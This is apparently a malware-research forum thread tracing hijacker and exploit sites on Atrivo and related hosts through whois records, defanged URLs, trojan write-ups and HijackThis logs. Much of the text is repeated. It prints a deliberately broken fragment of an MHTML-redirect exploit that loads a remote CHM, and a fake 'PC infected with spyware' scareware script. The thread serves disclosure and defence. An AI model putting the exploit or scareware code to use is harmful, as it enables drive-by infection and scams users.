Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------------
-------------------------------------------------------
http://www.whois.sc/searchinweb.com
1 domains found on 69.50.190.253
-----------------------------------------------------------
Mybizarre loads the following exploit pages from greg-tut/vparivalka.com...
There seems to be only one site registered to the IP address and its listed by sophos as trojan domain.
The hits in my firewall show it came from vparivalka.com/greg-tut ...
The page that loaded the exploit.. which my antivirus complained about being a MHTMLredir.Exploit
hxxp://vparivalka.com/G7/test.htm?id=11040&pop=
2:36:52 PM vparivalka.com 195.225.176.22
2:36:46 PM greg-tut.com 195.225.176.22
hxxp://vparivalka.com/G7/test.htm?id=11040&pop=
hxxp://greg-tut.com/G7/anticheatsys.php?id=11040
Also saw these Atrivo IPs :
hxxp://69.50.190.131/
Reverse IP: No websites hosted using this IP address
Reverse DNS: 69-50-190-131.esthost.com
hxxp://69.50.161.142/
www.Adult-catalog.net
www.Helpinweb.net
www.Pop-find.com
www.Refcount.com
www.Refcount.net
www.Waytofind.net
www.Webtopsearch.net
One of the exploit pages that was loaded:
hxxp://195.225.176.38/adverts/82/1.htm
http://www.whois.sc/loadcash.biz = 195.225.176.38
Broke up the code a bit to prevent antivirus warnings ..
test[1].htm
HEAD - body onbeforeunload = 'window.open
(" test.ani.htm " , " popup " , " top=10000 , left=10000 , width=100 , height=100,scrollbars=0,menubar=0,toolbar=0,location=0,personalbar=0,status=0,re
sizable=0" ) ' >
- script - try document. write (' object data= "& #'+ 109 + ';
s-its : mhtml '+' : '+' file : // C: \\ foo.mht ! hxxp://vparivalka.com/G7/chm10.chm :: / launch10.html "
type= " text / x-scriptlet " object '); catch (e)
script
From a google search , they are also using the domain name instead of the IP :
http://www.sophos.com/virusinfo/analyses/trojdloaderjw.html
Troj/Dloader-JW is a downloader Trojan.
Troj/Dloader-JW attempts to copy itself to the Windows system folder with the filename CMD32.EXE and to set the following entry in the registry so as to run itself on system startup, resetting this value periodically:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
ControlPanel
< Windows system folder >\cmd32.exe internat.dll,LoadKeyboardProfile
Troj/Dloader-JW attempts to download files from the following website to numbered files with DAT extensions or to the files CC.C or UU.U:
hxxp://www.loadcash.biz
Troj/Dloader-JW then copies the downloaded files to the Windows system folder with the following filenames and executes them:
izxxzdsafsafczxcr.exe
lpzxczxct.exe
izxczxcr.exe
intrcxzcxzcon.exe
intffdsronsad.exe
intfsdffdsronsad.exe
------------------------------------------
195.225.176.38
Blacklist Status: Listed
Cached Whois: Cached today
Whois History: 6 records stored
Record Type: IP Address
IP Location: United States - New York - New York - Netcathosting
Reverse IP: Web server hosts 1 websites
Reverse DNS: ip176-38.netcathost.com
inetnum: 195.225.176.0 - 195.225.179.255
netname: NETCATHOST
descr: NetcatHosting
country: UA
admin-c: VS1142-RIPE
tech-c: VS1142-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: NETCATHOST-MNT
mnt-routes: NETCATHOST-MNT
Domain Name: LOADCASH.BIZ
Domain ID: D9234139-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: ok
Registrant ID: OLNIC_781368_0_0
Registrant Name: Boris Fedorovich Semenov
Registrant Organization: Boris Fedorovich Semenov
Registrant Address1: Vasilia blajenovo - 56
Registrant City: Moscow
Registrant State/Province: MO
Registrant Postal Code: 567345
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.09565367656
Registrant Facsimile Number: +7.09565367656
########################################
http://www.whois.sc/searchinweb.com
1 domains found on 69.50.190.253
CODE
69.50.190.253 www.searchinweb.com
http://toolbar.searchinweb.com/
http://toolbar.searchinweb.com/
QUOTE
Domain Name: SEARCHINWEB.COM
Registrant:
Web Search
Smith Johanes
1129 Delaware Avenue
Buffalo
NY,14209
US
Tel. +7.148841626
Creation Date: 12-May-2004
Expiration Date: 12-May-2005
Domain servers in listed order:
ns5.esthost.com
ns6.esthost.com
Registrant:
Web Search
Smith Johanes
1129 Delaware Avenue
Buffalo
NY,14209
US
Tel. +7.148841626
Creation Date: 12-May-2004
Expiration Date: 12-May-2005
Domain servers in listed order:
ns5.esthost.com
ns6.esthost.com
-----------------------------------------------------------
QUOTE
69.50.190.252 www.mybizarre.com
www.Mybizarre.com
www.Tinyty.com
www.Zbdsm.com
Domain Name: MYBIZARRE.COM
Registrant:
Web Search
Smith Johanes
1129 Delaware Avenue
Buffalo
NY,14209
US
Tel. +7.148841626
Creation Date: 31-May-2004
Expiration Date: 31-May-2005
Domain servers in listed order:
ns5.esthost.com
ns6.esthost.com
www.Mybizarre.com
www.Tinyty.com
www.Zbdsm.com
Domain Name: MYBIZARRE.COM
Registrant:
Web Search
Smith Johanes
1129 Delaware Avenue
Buffalo
NY,14209
US
Tel. +7.148841626
Creation Date: 31-May-2004
Expiration Date: 31-May-2005
Domain servers in listed order:
ns5.esthost.com
ns6.esthost.com
Mybizarre loads the following exploit pages from greg-tut/vparivalka.com...
There seems to be only one site registered to the IP address and its listed by sophos as trojan domain.
The hits in my firewall show it came from vparivalka.com/greg-tut ...
The page that loaded the exploit.. which my antivirus complained about being a MHTMLredir.Exploit
hxxp://vparivalka.com/G7/test.htm?id=11040&pop=
2:36:52 PM vparivalka.com 195.225.176.22
2:36:46 PM greg-tut.com 195.225.176.22
hxxp://vparivalka.com/G7/test.htm?id=11040&pop=
hxxp://greg-tut.com/G7/anticheatsys.php?id=11040
Also saw these Atrivo IPs :
hxxp://69.50.190.131/
Reverse IP: No websites hosted using this IP address
Reverse DNS: 69-50-190-131.esthost.com
hxxp://69.50.161.142/
www.Adult-catalog.net
www.Helpinweb.net
www.Pop-find.com
www.Refcount.com
www.Refcount.net
www.Waytofind.net
www.Webtopsearch.net
One of the exploit pages that was loaded:
hxxp://195.225.176.38/adverts/82/1.htm
http://www.whois.sc/loadcash.biz = 195.225.176.38
Broke up the code a bit to prevent antivirus warnings ..
test[1].htm
CODE
HEAD - body onbeforeunload = 'window.open
(" test.ani.htm " , " popup " , " top=10000 , left=10000 , width=100 , height=100,scrollbars=0,menubar=0,toolbar=0,location=0,personalbar=0,status=0,re
sizable=0" ) ' >
- script - try document. write (' object data= "& #'+ 109 + ';
s-its : mhtml '+' : '+' file : // C: \\ foo.mht ! hxxp://vparivalka.com/G7/chm10.chm :: / launch10.html "
type= " text / x-scriptlet " object '); catch (e)
script
From a google search , they are also using the domain name instead of the IP :
CODE
www.loadcash.biz/adverts/42/1.htm
www.Loadcash.biz
www.Loadcash.biz
http://www.sophos.com/virusinfo/analyses/trojdloaderjw.html
Troj/Dloader-JW is a downloader Trojan.
Troj/Dloader-JW attempts to copy itself to the Windows system folder with the filename CMD32.EXE and to set the following entry in the registry so as to run itself on system startup, resetting this value periodically:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
ControlPanel
< Windows system folder >\cmd32.exe internat.dll,LoadKeyboardProfile
Troj/Dloader-JW attempts to download files from the following website to numbered files with DAT extensions or to the files CC.C or UU.U:
hxxp://www.loadcash.biz
Troj/Dloader-JW then copies the downloaded files to the Windows system folder with the following filenames and executes them:
izxxzdsafsafczxcr.exe
lpzxczxct.exe
izxczxcr.exe
intrcxzcxzcon.exe
intffdsronsad.exe
intfsdffdsronsad.exe
------------------------------------------
195.225.176.38
Blacklist Status: Listed
Cached Whois: Cached today
Whois History: 6 records stored
Record Type: IP Address
IP Location: United States - New York - New York - Netcathosting
Reverse IP: Web server hosts 1 websites
Reverse DNS: ip176-38.netcathost.com
inetnum: 195.225.176.0 - 195.225.179.255
netname: NETCATHOST
descr: NetcatHosting
country: UA
admin-c: VS1142-RIPE
tech-c: VS1142-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: NETCATHOST-MNT
mnt-routes: NETCATHOST-MNT
Domain Name: LOADCASH.BIZ
Domain ID: D9234139-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: ok
Registrant ID: OLNIC_781368_0_0
Registrant Name: Boris Fedorovich Semenov
Registrant Organization: Boris Fedorovich Semenov
Registrant Address1: Vasilia blajenovo - 56
Registrant City: Moscow
Registrant State/Province: MO
Registrant Postal Code: 567345
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.09565367656
Registrant Facsimile Number: +7.09565367656
########################################
QFIND.NET
www.qfind.net:69.50.161.123-69.50.161.123
69.50.160.0 - 69.50.191.255
Atrivo
3 domains found on 69.50.161.123
www.Catsearches.com
www.Personal404.com
www.Qfind.net
Domain Name: QFIND.NET
Registrant:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800
Creation Date: 24-Mar-2005
Expiration Date: 24-Mar-2006
Domain servers in listed order:
ns1.qfind.net
ns2.qfind.net
Administrative Contact:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800
Status:ACTIVE
Infection examples:
- http://forum.malwareremoval.com/viewtopic.php?t=1020 -
www.qfind.net:69.50.161.123-69.50.161.123
69.50.160.0 - 69.50.191.255
Atrivo
3 domains found on 69.50.161.123
www.Catsearches.com
www.Personal404.com
www.Qfind.net
Domain Name: QFIND.NET
Registrant:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800
Creation Date: 24-Mar-2005
Expiration Date: 24-Mar-2006
Domain servers in listed order:
ns1.qfind.net
ns2.qfind.net
Administrative Contact:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800
Status:ACTIVE
Infection examples:
- http://forum.malwareremoval.com/viewtopic.php?t=1020 -
QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qfind.net/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.qfind.net/search.php?qq=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page_bak = about:blank
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qfind.net/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.qfind.net/search.php?qq=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page_bak = about:blank
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/http://www.qfind.net/
More atrivotech hijacker garbage 
www.startsearches.net
www.startsearches.net:69.50.180.157-69.50.180.158
69.50.180.158
www.startsearches.net
69.50.160.0 - 69.50.191.255
Atrivo
69.50.180.157
ns2.startsearches.net
2 domains found on 69.50.180.158
www.Startsearches.net
www.Updatesearches.com
http://www.whois.sc/startsearches.net
http://www.whois.sc/updatesearches.com
Domain Name: STARTSEARCHES.NET
Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716
Creation Date: 05-May-2005
Expiration Date: 05-May-2006
Domain servers in listed order:
ns1.startsearches.net
ns2.startsearches.net
Infection Examples:
Domain Name: UPDATESEARCHES.COM
Registrant:
Henn Preson
291 Senevens ave.
Stockholm
,49271
SE
Tel. +44.2958297292
Creation Date: 24-May-2005
Expiration Date: 24-May-2006
Domain servers in listed order:
ns1.updatesearches.com
ns2.updatesearches.com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
QUICKNAVIGATE.COM
www.quicknavigate.com:69.50.180.154-69.50.180.155
69.50.180.154
www.quicknavigate.com
69.50.160.0 - 69.50.191.255
Atrivo
69.50.180.155
ns2.quicknavigate.com
http://www.whois.sc/quicknavigate.com
Domain Name: QUICKNAVIGATE.COM
Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716
Creation Date: 05-May-2005
Expiration Date: 05-May-2006
Domain servers in listed order:
ns1.quicknavigate.com
ns2.quicknavigate.com
Infection Examples:
------
oneclicksearches.com
oneclicksearches.com - 69.50.180.155
[ shares the same IP as ns2.quicknavigate.com ]
Creation Date: 24-May-2005
Expiration Date: 24-May-2006
Searchmaid.com copy site with the stealthSWs114.h!dll spyware hoax popups:
http://www.webhelper4u.com/CWS/Research/sc...idinfected.html
-------
www.startsearches.net
www.startsearches.net:69.50.180.157-69.50.180.158
69.50.180.158
www.startsearches.net
69.50.160.0 - 69.50.191.255
Atrivo
69.50.180.157
ns2.startsearches.net
2 domains found on 69.50.180.158
www.Startsearches.net
www.Updatesearches.com
http://www.whois.sc/startsearches.net
http://www.whois.sc/updatesearches.com
Domain Name: STARTSEARCHES.NET
Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716
Creation Date: 05-May-2005
Expiration Date: 05-May-2006
Domain servers in listed order:
ns1.startsearches.net
ns2.startsearches.net
Infection Examples:
QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hzzp://www.startsearches.net/bar.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = hzzp://www.startsearches.net/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hzzp://www.startsearches.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hzzp://www.startsearches.net/bar.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = hzzp://www.startsearches.net/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hzzp://www.startsearches.net/
Domain Name: UPDATESEARCHES.COM
Registrant:
Henn Preson
291 Senevens ave.
Stockholm
,49271
SE
Tel. +44.2958297292
Creation Date: 24-May-2005
Expiration Date: 24-May-2006
Domain servers in listed order:
ns1.updatesearches.com
ns2.updatesearches.com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
QUICKNAVIGATE.COM
www.quicknavigate.com:69.50.180.154-69.50.180.155
69.50.180.154
www.quicknavigate.com
69.50.160.0 - 69.50.191.255
Atrivo
69.50.180.155
ns2.quicknavigate.com
http://www.whois.sc/quicknavigate.com
Domain Name: QUICKNAVIGATE.COM
Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716
Creation Date: 05-May-2005
Expiration Date: 05-May-2006
Domain servers in listed order:
ns1.quicknavigate.com
ns2.quicknavigate.com
Infection Examples:
QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.quicknavigate.com/bar.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.quicknavigate.com/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.quicknavigate.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.quicknavigate.com/bar.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.quicknavigate.com/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.quicknavigate.com/
------
oneclicksearches.com
oneclicksearches.com - 69.50.180.155
[ shares the same IP as ns2.quicknavigate.com ]
Creation Date: 24-May-2005
Expiration Date: 24-May-2006
Searchmaid.com copy site with the stealthSWs114.h!dll spyware hoax popups:
http://www.webhelper4u.com/CWS/Research/sc...idinfected.html
QUOTE
script name=' JavaScript '
var answer = confirm ('Attention! \r\rYor PC is infected with spyware.\r\rBrowser version: ' + navigator.appVersion + '\r Spyware details: \"stealthSWs114.h!dll\" ver.4.442as18a.\raccess port:#33299 \r\rWarning!\r Your private data or information ( Credit Card numbers, any adresses, contacts etc.)\r may be used by malefactors in some criminal actions. \r\r\rClick \"OK\" button to get list of available AntiSpyware products.'); if (answer)
window.location = 'java/search.php?qq=spyware'
script
var answer = confirm ('Attention! \r\rYor PC is infected with spyware.\r\rBrowser version: ' + navigator.appVersion + '\r Spyware details: \"stealthSWs114.h!dll\" ver.4.442as18a.\raccess port:#33299 \r\rWarning!\r Your private data or information ( Credit Card numbers, any adresses, contacts etc.)\r may be used by malefactors in some criminal actions. \r\r\rClick \"OK\" button to get list of available AntiSpyware products.'); if (answer)
window.location = 'java/search.php?qq=spyware'
script
-------
2 domains found on 69.50.166.74
www.Clicksearchclick.com
www.Daoclick.com
Domain name: clicksearchclick.com
Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB
Domain name: daoclick.com
Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB
www.Clicksearchclick.com
www.Daoclick.com
Domain name: clicksearchclick.com
Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB
Domain name: daoclick.com
Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB
QUOTE
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.clicksearchclick.com/
been a while since we had any posts in this thread... 
.wmf Exploit hijack sites:
http://www.microsoft.com/technet/security/...n/ms06-001.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html
http://sunbeltblog.blogspot.com/2005/12/ne...ly-patched.html
http://isc.sans.org/diary.php?storyid=997
1st .wmf exploit hit from:
hxxp://63.246.144.140/123.wmf
2nd hit from :
hxxp://game4all.biz/adv/049/xpl.wmf
===============================
Both called an inhoster server [whole IP range is in the spyware blocklist]
hxxp://85.255.113.10/?to=nan44&from=in
hxxp://85.255.113.22/inc/nan44.html
=====
1:
=====
hxxp://63.246.144.140/
hxxp://63.246.144.140/123.wmf
reverse dns for sakura.ctgameinfo.com = 216.55.190.209
=====
2:
=====
game4all.biz = 217.107.217.184
Spam blacklist details:
http://www.whois.sc/rbl/?ip=217.107.217.184
=================================
File harvest from hxxp://85.255.113.10/?to=nan44&from=in
I had to kill all the vxgame.exe's running as red x's in the systray , was bogging the system down too much .. then made a hijackthis log
yes , my system date is nov 2005 on purpose
Created folder :
c:\windows\temp\pay4.tmp.exe
C:\winstall.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\System32\kernels64.exe
C:\WINDOWS\System32\igfxsrv.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\sysldr32.exe
Outbound connection by vxgame6.exe [ spambot? ] on smtp/port 25 to :
C:\WINDOWS\System32\msvcp.exe
http://www.sophos.com/virusinfo/analyses/trojagenthy.html
C:\WINDOWS\system32\msupdate32.dll
C:\WINDOWS\system32\mspostsp.exe
http://www.sophos.com/virusinfo/analyses/trojjupdropb.html
couldnt locate C:\WINDOWS\System32\igfxsrv.exe or pay4.tmp.exe
=================
Domains/IPs involved:
sakura.ctgameinfo.com 63.246.144.140
game4all.biz = 217.107.217.184
hxxp://85.255.113.10/
85.255.112.0 - 85.255.127.255
Inhoster hosting company
hxxp://httphost1/trial.php?rest=0&ver=16249104&a=00000002 69.50.175.178
hxxp://69.50.173.166/
69.50.173.166
69.50.160.0 - 69.50.191.255
InterCage, Inc
-
hxxp://evko.biz/
66.235.180.23
evko.biz
66.235.160.0 - 66.235.191.255
HopOne Internet Corporation
1010 Wisconsin Avenue N.W.
Washington
DC
-
hxxp://72.36.244.185/
72.36.244.185
blackhatz.info
72.36.244.129 - 72.36.244.255
Internet Technologies Ltd
IP Management Department
Saint Petersburg
Russian Federation
-
hxxp://www.crystalysmedia.com/
209.8.60.8
www.crystalysmedia.com
209.8.0.0 - 209.9.255.255
Beyond The Network America, Inc.
Reston Executive Center
-
hxxp://core.psyche-evolution.com/
64.62.171.238
core.psyche-evolution.com
McColo Corporation
-
hxxp://krostagur.info/
hxxp://buhartes.info/
hxxp://fantastar.info/
216.255.187.66
buhartes.info
216.255.176.0 - 216.255.191.255
InterCage, Inc.
-
hxxp://webfastlink-us.com/mafia/
81.31.34.130
webfastlink-us.com
81.31.32.0 - 81.31.35.255
Master Internet s.r.o.
Czech Republic
-
hxxp://69.50.161.106/
hxxp://badgirlspink.com/
hxxp://banners.geotarget.info/
hxxp://banners.sexsearch.com/
hxxp://ads.adultfriendfinder.com/
hxxp://banners.adultfriendfinder.com/
hxxp://graphics.adultfriendfinder.com/
hxxp://www.spicymovies.com/sex.gif
hxxp://sex.com/
.wmf Exploit hijack sites:
http://www.microsoft.com/technet/security/...n/ms06-001.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html
http://sunbeltblog.blogspot.com/2005/12/ne...ly-patched.html
http://isc.sans.org/diary.php?storyid=997
1st .wmf exploit hit from:
hxxp://63.246.144.140/123.wmf
2nd hit from :
hxxp://game4all.biz/adv/049/xpl.wmf
===============================
Both called an inhoster server [whole IP range is in the spyware blocklist]
hxxp://85.255.113.10/?to=nan44&from=in
hxxp://85.255.113.22/inc/nan44.html
QUOTE
85.255.112.0 - 85.255.127.255
Inhoster hosting company
Inhoster hosting company
=====
1:
=====
hxxp://63.246.144.140/
hxxp://63.246.144.140/123.wmf
QUOTE
63.246.144.140
sakura.ctgameinfo.com
63.246.144.140 - 63.246.144.149
Konstantin Chibrikov
Kotowskogo 5-52
Smolensk
8. Customer Postal Code: 214027
Russian Federation
FTP - 21 220 ProFTPD 1.3.0rc3 Server (ProFTPD Default Installation) [63.246.144.140]
HTTP - 80 HTTP/1.1 200 OK
Date: Fri, 27 Jan 2006 19:59:39 GMT
Server: Apache/1.3.34 (Unix) PHP/4.4.1 mod_ssl/2.8.25 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
sakura.ctgameinfo.com
63.246.144.140 - 63.246.144.149
Konstantin Chibrikov
Kotowskogo 5-52
Smolensk
8. Customer Postal Code: 214027
Russian Federation
FTP - 21 220 ProFTPD 1.3.0rc3 Server (ProFTPD Default Installation) [63.246.144.140]
HTTP - 80 HTTP/1.1 200 OK
Date: Fri, 27 Jan 2006 19:59:39 GMT
Server: Apache/1.3.34 (Unix) PHP/4.4.1 mod_ssl/2.8.25 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
reverse dns for sakura.ctgameinfo.com = 216.55.190.209
QUOTE
1 domains found on 216.55.190.209 :
www.Logonvine.com
216.55.128.0 - 216.55.191.255
Abacus America Inc
www.Logonvine.com
216.55.128.0 - 216.55.191.255
Abacus America Inc
=====
2:
=====
game4all.biz = 217.107.217.184
QUOTE
217.107.217.184
217.107.217.128 - 217.107.217.191
Co-location and dedicated service
Moscow, Russia
Russian Federation
Anatoliy Voronin
BesTTest HardWare Lab.
125364, Moscow, Russia
Norilskaya str., 13A
217.107.217.128 - 217.107.217.191
Co-location and dedicated service
Moscow, Russia
Russian Federation
Anatoliy Voronin
BesTTest HardWare Lab.
125364, Moscow, Russia
Norilskaya str., 13A
Spam blacklist details:
http://www.whois.sc/rbl/?ip=217.107.217.184
=================================
File harvest from hxxp://85.255.113.10/?to=nan44&from=in
I had to kill all the vxgame.exe's running as red x's in the systray , was bogging the system down too much .. then made a hijackthis log
yes , my system date is nov 2005 on purpose
QUOTE
Logfile of HijackThis v1.99.1
Scan saved at 9:44:05 PM, on 11/4/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\VMware\VMware Tools\VMwareService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\Program Files\Common Files\Acronis\Schedule\schedule.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
C:\Program Files\Ad Muncher\AdMunch.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\PROGRA~1\Greatis\REGRUN~1\WatchDog.exe
C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
C:\Program Files\GhostSurf 2005\Proxy.exe
C:\Program Files\Sysinternals\ProcessExplorerNt\procexp.exe
C:\Program Files\CaptureWiz\Pro\CaptureWiz.exe
C:\Program Files\2xexplorer\2xExplorer\2xExplorer.exe
C:\System Tools\hijackthis\HijackThis.exe
